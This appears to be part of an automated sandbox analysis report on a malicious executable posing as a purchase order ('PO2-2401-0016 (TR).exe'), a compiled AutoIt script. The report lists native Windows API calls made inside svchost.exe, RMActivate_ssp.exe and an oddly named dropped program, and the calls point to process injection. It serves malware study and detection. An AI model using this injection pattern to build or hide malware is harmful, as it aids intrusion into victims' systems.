            Source: PO2-2401-0016 (TR).exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_991c4913-3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C863 NtClose,2_2_0042C863
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,2_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA4340 NtSetContextThread,LdrInitializeThunk,5_2_02EA4340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA4650 NtSuspendThread,LdrInitializeThunk,5_2_02EA4650
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2AF0 NtWriteFile,LdrInitializeThunk,5_2_02EA2AF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2AD0 NtReadFile,LdrInitializeThunk,5_2_02EA2AD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02EA2BE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02EA2BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02EA2BA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2B60 NtClose,LdrInitializeThunk,5_2_02EA2B60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02EA2EE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02EA2E80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2FE0 NtCreateFile,LdrInitializeThunk,5_2_02EA2FE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2FB0 NtResumeThread,LdrInitializeThunk,5_2_02EA2FB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2F30 NtCreateSection,LdrInitializeThunk,5_2_02EA2F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02EA2CA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2C60 NtCreateKey,LdrInitializeThunk,5_2_02EA2C60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02EA2C70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02EA2DF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02EA2DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02EA2D30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02EA2D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA35C0 NtCreateMutant,LdrInitializeThunk,5_2_02EA35C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA39B0 NtGetContextThread,LdrInitializeThunk,5_2_02EA39B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2AB0 NtWaitForSingleObject,5_2_02EA2AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2B80 NtQueryInformationFile,5_2_02EA2B80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2EA0 NtAdjustPrivilegesToken,5_2_02EA2EA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2E30 NtWriteVirtualMemory,5_2_02EA2E30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2FA0 NtQuerySection,5_2_02EA2FA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2F90 NtProtectVirtualMemory,5_2_02EA2F90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2F60 NtCreateProcessEx,5_2_02EA2F60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2CF0 NtOpenProcess,5_2_02EA2CF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2CC0 NtQueryVirtualMemory,5_2_02EA2CC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2C00 NtQueryInformationProcess,5_2_02EA2C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2DB0 NtEnumerateKey,5_2_02EA2DB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA2D00 NtSetInformationFile,5_2_02EA2D00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA3090 NtSetValueKey,5_2_02EA3090
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA3010 NtOpenDirectoryObject,5_2_02EA3010
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA3D70 NtOpenThread,5_2_02EA3D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA3D10 NtOpenProcessToken,5_2_02EA3D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_00368DD0 NtCreateFile,5_2_00368DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_00368F30 NtReadFile,5_2_00368F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_00369020 NtDeleteFile,5_2_00369020
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_003690C0 NtClose,5_2_003690C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_00369220 NtAllocateVirtualMemory,5_2_00369220
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDF13A NtQueryInformationProcess,5_2_02BDF13A
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_001BD5EB
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001B1201
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001BE8F6
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0015BF400_2_0015BF40
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C20460_2_001C2046
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001580600_2_00158060
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001B82980_2_001B8298
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0018E4FF0_2_0018E4FF
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0018676B0_2_0018676B
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001E48730_2_001E4873
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0017CAA00_2_0017CAA0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0015CAF00_2_0015CAF0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0016CC390_2_0016CC39
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00186DD90_2_00186DD9
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0016B1190_2_0016B119
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001591C00_2_001591C0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001713940_2_00171394
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001717060_2_00171706
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0017781B0_2_0017781B
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001579200_2_00157920
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0016997D0_2_0016997D
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001719B00_2_001719B0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00177A4A0_2_00177A4A
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00171C770_2_00171C77
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00177CA70_2_00177CA7
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001DBE440_2_001DBE44
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00189EEE0_2_00189EEE
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00171F320_2_00171F32
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_036E0A600_2_036E0A60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189132_2_00418913
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019A72_2_004019A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101CA2_2_004101CA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416ADE2_2_00416ADE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AE32_2_00416AE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B1D2_2_00402B1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B202_2_00402B20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4732_2_0040E473
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035162_2_00403516
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035202_2_00403520
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EE632_2_0042EE63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027002_2_00402700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_04890C0E3_2_04890C0E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_04890C053_2_04890C05
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_048975193_2_04897519
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_0489751E3_2_0489751E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_0488EEAE3_2_0488EEAE
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_04890E2E3_2_04890E2E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_048AF89E3_2_048AF89E
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_0489934A3_2_0489934A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EF02C05_2_02EF02C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F102745_2_02F10274
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F303E65_2_02F303E6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7E3F05_2_02E7E3F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2A3525_2_02F2A352
